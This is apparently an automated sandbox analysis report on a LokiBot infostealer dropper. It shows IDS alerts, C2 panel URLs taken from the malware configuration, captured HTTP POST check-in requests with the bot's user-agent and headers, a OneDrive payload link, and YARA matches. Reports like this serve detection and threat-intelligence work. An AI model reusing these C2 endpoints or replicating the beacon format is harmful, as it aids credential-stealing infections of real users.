                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49720 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49720 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49720
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49721 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49721 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49721 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49721 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49721 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49721
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49722 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49722 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49722 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49722 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49722 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49722
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49723 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49723 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49723 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49723 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49723 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49723
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49724 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49724 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49724 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49724 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49724 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49724
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49725 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49725 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49725 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49725 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49725 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49725
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49726 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49726 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49726 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49726 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49726 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49726
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49727 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49727 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49727 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49727 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49727 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49727
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49728 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49728 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49728 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49728 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49728 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49728
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49729 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49729 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49729 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49729 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49729 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49729
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49730 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49730 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49730 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49730 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49730 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49730
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49731 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49731 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49731 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49731 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49731 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49731
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49732 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49732 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49732 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49732 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49732 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49732
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Malware configuration extractorURLs: http://sedesadre.gq/PKZ/PWS/fre.php
                Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 198Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 198Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: global trafficHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.516579808.0000000001529000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.397774648.00000000009AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.521644432.000000000327E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.519732360.0000000003147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                Source: powershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000001.00000002.404488163.0000000004A9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.518826525.0000000003087000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.401922859.0000000004961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: RegAsm.exe, 0000000E.00000002.537381760.00000000004A0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://sedesadre.gq/PKZ/PWS/fre.php
                Source: powershell.exe, 00000001.00000002.404488163.0000000004A9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: svchost.exe, 00000005.00000002.320847106.0000014604A13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                Source: powershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                Source: svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                Source: svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                Source: svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                Source: svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                Source: svchost.exe, 00000005.00000002.321163191.0000014604A4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.319680997.0000014604A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                Source: svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                Source: svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                Source: svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                Source: svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                Source: svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                Source: svchost.exe, 00000005.00000003.319937311.0000014604A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321132883.0000014604A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                Source: svchost.exe, 00000005.00000003.319937311.0000014604A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321132883.0000014604A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                Source: svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                Source: svchost.exe, 00000005.00000003.319937311.0000014604A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                Source: svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000005.00000003.319680997.0000014604A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                Source: svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                Source: svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000005.00000003.297637720.0000014604A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.519404605.00000000030D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://edi4gw.db.files.1drv.com/y4moAVxpkKoBi-6Ib81P-C-8nQTO5eCh6D0sQf0K95pl0pcu4vWhHgGACuDQhzDgbUK
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.519404605.00000000030D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://edi4gw.db.files.1drv.com4
                Source: powershell.exe, 00000001.00000002.404488163.0000000004A9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000001.00000002.420135572.00000000051CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.518826525.0000000003087000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.518826525.0000000003087000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=9A063D4B0D931024&resid=9A063D4B0D931024
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeString found in binary or memory: https://onedrive.live.com/download?cid=9A063D4B0D931024&resid=9A063D4B0D931024%21128&authkey=AFWFoMk
                Source: svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                Source: svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.320944817.0000014604A27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000005.00000003.297637720.0000014604A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000005.00000002.321224479.0000014604A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000005.00000003.297637720.0000014604A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                Source: svchost.exe, 00000005.00000003.297637720.0000014604A31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321064418.0000014604A3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                Source: svchost.exe, 00000005.00000002.321163191.0000014604A4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.319680997.0000014604A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.531258657.0000000006C30000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000003.490102974.00000000045F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.531258657.0000000006C30000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000003.490102974.00000000045F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                Source: unknownHTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 198Connection: close
                Source: unknownDNS traffic detected: queries for: onedrive.live.com

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
